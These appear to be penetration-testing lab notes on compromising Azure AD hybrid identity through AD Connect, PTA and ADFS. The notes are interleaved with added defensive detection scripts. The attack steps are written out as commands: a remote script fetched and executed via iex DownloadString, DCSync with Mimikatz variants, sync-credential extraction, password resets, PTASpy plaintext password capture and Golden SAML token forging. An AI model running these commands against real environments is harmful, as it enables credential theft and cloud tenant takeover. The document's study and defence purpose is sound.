Hybrid Identities

  • use on-prem identities to access azure applications

    • Azure AD-connect
      • Password Hash Sync
      • Pass-Through Authentication
      • Federation
  • hybrid identity on-prem to cloud

    • on prem: an MSOL_<installationidentifier> account is created in AD
    • any on-prem persistence mechanism that gives us either DA on-prem or local admin on the Azure AD Connect server will allow us to get GA on Azure AD
      • PHS: extract the credentials
      • PTA: install the agent
      • Federation: extract the certificate from ADFS

Find the Computer Running ADConnect

Find out where AD-Connect is running:

PS> Get-ADUser -Filter "samAccountName -like 'MSOL_*'" -Server techcorp.local -Properties * | select SamAccountName,Description | fl
# in the description should be the computer name

on the ad connect computer:

PS> echo F | xcopy C:\AD\Tools\InviShell\InShellProf.dll \\us-adconnect\C$\Users\helpdeskadmin\Downloads\InShellProf.dll /Y
PS> echo F | xcopy C:\AD\Tools\InviShell\RunWithRegistryNonAdmin.bat \\us-adconnect\C$\Users\helpdeskadmin\Downloads\RunWithRegistryNonAdmin.bat /Y
PS> winrs -r:us-adconnect cmd
PS> cd C:\Users\helpdeskadmin\Downloads
PS> RunWithRegistryNonAdmin.bat
PS> iex (New-Object Net.WebClient).DownloadString('http://192.168.100.21/adconnect.ps1')
PS> ADconnect

use the following from an admin-shell:

PS> runas /user:techcorp.local\MSOL_16fb75d0227d /netonly cmd
PS> C:\AD\Tools\SafetyKatz.exe "lsadump::dcsync /user:techcorp\administrator /domain:techcorp.local" "exit"

or the following from a non-admin shell:

PS> runas /user:techcorp.local\MSOL_16fb75d0227d /netonly cmd
PS> C:\AD\Tools\InviShell\RunWithRegistryNonAdmin.bat
PS> . C:\AD\Tools\Invoke-Mimi.ps1
PS> Invoke-Mimi -Command '"lsadump::dcsync /user:techcorp\administrator /domain:techcorp.local"'
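
The MSOL_ account above can DCSync because it holds the two replication extended rights on the domain root. The following added defensive check (not part of the original notes) lists every principal holding those rights and flags any that are not DCs, built-in admin groups or the MSOL_ account; it assumes the RSAT ActiveDirectory module on a domain-joined host.

```powershell
# Added check: who can DCSync this domain? Assumes the ActiveDirectory module (AD: drive).
Import-Module ActiveDirectory

# Extended-right GUIDs behind DCSync: DS-Replication-Get-Changes and -Get-Changes-All.
$ReplRights = @{
    '1131f6aa-9c07-11d1-f79f-00c04fc2dcd2' = 'DS-Replication-Get-Changes'
    '1131f6ad-9c07-11d1-f79f-00c04fc2dcd2' = 'DS-Replication-Get-Changes-All'
}

function Get-ReplicationRightHolders {
    $domain = Get-ADDomain
    # The AD: drive is provided by the ActiveDirectory module.
    $acl = Get-Acl -Path ('AD:\' + $domain.DistinguishedName)

    $acl.Access |
        Where-Object { $_.AccessControlType -eq 'Allow' -and
                       $ReplRights.ContainsKey($_.ObjectType.ToString()) } |
        ForEach-Object {
            $id = $_.IdentityReference.Value
            [pscustomobject]@{
                Identity = $id
                Right    = $ReplRights[$_.ObjectType.ToString()]
                # Holders present by design: DCs, RODCs, admin groups and the AAD Connect
                # MSOL_ account. Anything else is a DCSync persistence candidate.
                Expected = $id -match '\\(Domain Controllers|Enterprise (Read-only )?Domain Controllers|Domain Admins|Enterprise Admins|Administrators|MSOL_[0-9a-f]+)$'
            }
        }
}

Get-ReplicationRightHolders | Sort-Object Expected, Identity | Format-Table -AutoSize
```

Rows with Expected = False are the ones to explain; an MSOL_ account whose description does not name the real AAD Connect server belongs in that set too.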

Password Hash Sync (PHS)

  • syncs a hash of the password hash
  • expiry date is not synced
  • on-prem MSOL_ user: can DCSync AD
  • azure: sync_onprem_installationid
    • can reset the password of any Azure user
  • the passwords for both are stored in plaintext on the on-prem SQL server, making it a high-value target

Enumerate

PS> Get-ADUser -Filter "samAccountName -like 'MSOL_*'" -Properties * | select SamAccountName, Description | fl
PS> Get-AzureADUser -All $true | ?{$_.userPrincipalName -match "Sync_"}

Abuse

PS> Get-AADIntSyncCredentials
 
# do dcsync
PS> runas /netonly /user:defeng.corp\MSOL_782bef6aa0a9 cmd
PS> Invoke-Mimikatz -Command ..
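
The "runas /netonly" as MSOL_ from a non-AAD-Connect box leaves a network logon of the MSOL_ account on the DC from the wrong source, and the DCSync itself leaves 4662 replication reads. The following added detection script (not from the original notes) flags both; it assumes logon and directory-service-access auditing are enabled on the DC, and the DC name, AAD Connect host name and IP are assumed values.

```powershell
# Added detection script: MSOL_ used off-host, and replication reads by unexpected principals.
param(
    [string]$DC = 'us-dc',                     # assumed: DC whose Security log is read
    [string]$AadConnectHost = 'us-adconnect',  # assumed: AAD Connect server name
    [string]$AadConnectIp = '192.168.100.50',  # assumed: AAD Connect server IP
    [int]$Hours = 24
)
$since = (Get-Date).AddHours(-$Hours)
# DS-Replication-Get-Changes and DS-Replication-Get-Changes-All extended rights.
$replGuids = '1131f6aa-9c07-11d1-f79f-00c04fc2dcd2', '1131f6ad-9c07-11d1-f79f-00c04fc2dcd2'

function Get-EventField($Event, $Name) {
    # Pull a named EventData field out of the event XML.
    $x = [xml]$Event.ToXml()
    ($x.Event.EventData.Data | Where-Object Name -eq $Name).'#text'
}

# (1) MSOL_ logons that did not originate from the AAD Connect host.
Get-WinEvent -ComputerName $DC -FilterHashtable @{ LogName = 'Security'; Id = 4624; StartTime = $since } -ErrorAction SilentlyContinue |
    Where-Object { (Get-EventField $_ 'TargetUserName') -like 'MSOL_*' } |
    ForEach-Object {
        $ws = Get-EventField $_ 'WorkstationName'
        $ip = Get-EventField $_ 'IpAddress'
        if ($ws -notlike "$AadConnectHost*" -and $ip -ne $AadConnectIp) {
            [pscustomobject]@{ Time = $_.TimeCreated; Alert = 'MSOL_ logon off the AAD Connect host'
                               User = (Get-EventField $_ 'TargetUserName'); Workstation = $ws; IpAddress = $ip }
        }
    }

# (2) Replication reads by unexpected principals (MSOL_ and machine accounts are expected).
Get-WinEvent -ComputerName $DC -FilterHashtable @{ LogName = 'Security'; Id = 4662; StartTime = $since } -ErrorAction SilentlyContinue |
    Where-Object {
        $props = Get-EventField $_ 'Properties'
        ($replGuids | Where-Object { $props -match $_ }) -and
        (Get-EventField $_ 'SubjectUserName') -notmatch '^(MSOL_|.*\$$)'
    } |
    ForEach-Object {
        [pscustomobject]@{ Time = $_.TimeCreated; Alert = 'Replication read by unexpected principal'
                           User = (Get-EventField $_ 'SubjectDomainName') + '\' + (Get-EventField $_ 'SubjectUserName') }
    }
```

Run it against every DC, since the logon and the replication request land on whichever DC the client picked.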

on prem to cloud

  • request AADGraph token
  • with that we can reset any user password
  • get cloud anchor user_<objectid>

Get-AADIntSyncCredentials

# now we have the sync credentials!
$passwd = ConvertTo-SecureString 'password' -AsPlainText -Force
$creds = New-Object System.Management.Automation.PSCredential ("[email protected]", $passwd)
Get-AADIntAccessTokenForAADGraph -Credentials $creds -SaveToCache

# get the ImmutableId
Get-AADIntUser -UserPrincipalName [email protected] | select ImmutableId

# reset the onpremadmin user's password
Set-AADIntUserPassword -SourceAnchor "E2gG19HA4EaDe0+3LkcS5g==" -Password "SuperSecretpass#12321" -Verbose

Pass-through-Authentication (PTA)

  • usernames are synced, but authentication is forwarded to on-prem AD
  • for enforcing on-prem password policies
  • authentication agent on-prem
    • shared secret between Azure AD and on-prem agent

# check if ad synchronization is configured
Get-ADSyncConnector
Get-Command -Module PassthroughAuthPSModule # check if PtA is configured

Import-Module C:\Users\adconnectadmin\Documents\AADInternals\AADInternals.psd1
Install-AADIntPTASpy

# get some plaintext passwords
Get-AADIntPTASpyLog -DecodePasswords

on-prem to cloud

You can also install your own adsync (PTA) agent and use it to authorize any authentication attempt, a skeleton-key attack.
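
PTASpy works by injecting a DLL into the on-prem PTA agent process. The following added integrity check (not from the original notes) verifies that the agent process only has modules loaded from trusted locations and that the tool's working directory is absent; the agent process name and the PTASpy default path are assumed values, and it must run elevated on the agent host.

```powershell
# Added check: does the PTA agent process carry foreign modules or PTASpy artefacts?
function Test-PtaAgentIntegrity {
    param(
        [string]$ProcessName = 'AzureADConnectAuthenticationAgentService',  # assumed agent process name
        [string[]]$TrustedRoots = @("$env:SystemRoot\", "$env:ProgramFiles\", "${env:ProgramFiles(x86)}\"),
        [string]$SpyPath = 'C:\PTASpy'                                       # assumed PTASpy default dir
    )
    $findings = @()
    $procs = @(Get-Process -Name $ProcessName -ErrorAction SilentlyContinue)
    if ($procs.Count -eq 0) { return [pscustomobject]@{ Status = 'AgentNotRunning'; Findings = @() } }

    foreach ($p in $procs) {
        # Module enumeration of a service process needs an elevated shell.
        foreach ($m in $p.Modules) {
            $file = $m.FileName
            if (-not $file) { continue }
            $trusted = $false
            foreach ($root in $TrustedRoots) {
                if ($file.StartsWith($root, [System.StringComparison]::OrdinalIgnoreCase)) { $trusted = $true }
            }
            if (-not $trusted) { $findings += "PID $($p.Id): module loaded from untrusted path $file" }
        }
    }
    if (Test-Path $SpyPath) { $findings += "$SpyPath exists (PTASpy log/DLL location)" }

    [pscustomobject]@{
        Status   = if ($findings.Count -gt 0) { 'Suspicious' } else { 'Clean' }
        Findings = $findings
    }
}
Test-PtaAgentIntegrity | Format-List
```

The rogue-agent case is the other half: the list of registered agents in the Azure AD Connect blade (Pass-through authentication) should only contain hosts you deployed.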

Federation

  • uses the SAML2 protocol
  • all authentication occurs on-prem
  • users can access cloud applications with their on-prem credentials
  • ImmutableID is stored on-prem in ms-DS-ConsistencyGuid
  • if the IdP is compromised we can forge a SAML token for any user (Golden SAML attack)

Import-Module C:\Users\adconnectadmin\Documents\AADInternals\AADInternals.psd1
 
# export the token signing certificate
Export-AADIntADFSSigningCertificate

on the attacker-vm

# get immutableID of the user we want to compromise
Import-Module C:\AzAD\Tools\ADModule\Microsoft.ActiveDirectory.Management.dll
Import-Module C:\AzAD\Tools\ADModule\ActiveDirectory\ActiveDirectory.psd1
[System.Convert]::ToBase64String((Get-ADUser -Identity onpremuser -Server 172.16.4.1 -Credential $creds | select -ExpandProperty ObjectGUID).tobytearray())

back on the server:

Open-AADIntOffice365Portal -ImmutableID v1pOC7Pz8kaT6JWtThJKRQ== -Issuer http://deffin.com/adfs/services/trust -PfxFileName C:\users\adfsadmin\Documents\ADFSSigningCertificate.pfx -Verbose
 
# open the html file with chrome to access the deffin.com tenant
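
Golden SAML relies on a token-signing certificate that Azure AD trusts for the federated domain. The following added defensive check (not from the original notes) compares the token-signing certificates ADFS actually holds with the certificates Azure AD trusts for the domain, so that a cloud-trusted certificate ADFS never issued or an unexplained rollover stands out; it assumes the ADFS and MSOnline modules, a prior Connect-MsolService, and that it runs on the ADFS server, with deffin.com taken from the notes above.

```powershell
# Added check: do ADFS and Azure AD agree on the token-signing certificates for the domain?
function Compare-FederationSigningCerts {
    param([string]$DomainName = 'deffin.com')

    # What ADFS currently holds.
    $adfs = Get-AdfsCertificate -CertificateType Token-Signing | ForEach-Object {
        [pscustomobject]@{ Thumbprint = $_.Certificate.Thumbprint; IsPrimary = $_.IsPrimary
                           NotAfter = $_.Certificate.NotAfter }
    }

    # What Azure AD trusts for the domain: the current and the next signing certificate.
    $fed   = Get-MsolDomainFederationSettings -DomainName $DomainName
    $cloud = foreach ($b64 in @($fed.SigningCertificate, $fed.NextSigningCertificate)) {
        if (-not $b64) { continue }
        $c = [System.Security.Cryptography.X509Certificates.X509Certificate2]::new([Convert]::FromBase64String($b64))
        [pscustomobject]@{ Thumbprint = $c.Thumbprint; Subject = $c.Subject; NotAfter = $c.NotAfter }
    }

    $onlyCloud = @($cloud | Where-Object { $_.Thumbprint -notin @($adfs.Thumbprint) })
    $onlyAdfs  = @($adfs  | Where-Object { $_.Thumbprint -notin @($cloud.Thumbprint) })
    [pscustomobject]@{
        Domain             = $DomainName
        IssuerUri          = $fed.IssuerUri
        AdfsCertificates   = $adfs
        CloudTrusted       = $cloud
        TrustedOnlyInCloud = $onlyCloud   # trusted by Azure AD but unknown to ADFS: investigate
        HeldOnlyInAdfs     = $onlyAdfs    # rollover not yet published, or config drift
        Drift              = ($onlyCloud.Count -gt 0 -or $onlyAdfs.Count -gt 0)
    }
}
Compare-FederationSigningCerts | Format-List
```

A token signed with the genuine, exported certificate shows no drift here; that variant needs correlation of Azure AD federated sign-ins against ADFS token-issuance events.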

Seamless SSO

  • supported by PHS and PTA
  • computer account AZUREADSSOACC in on-prem AD directory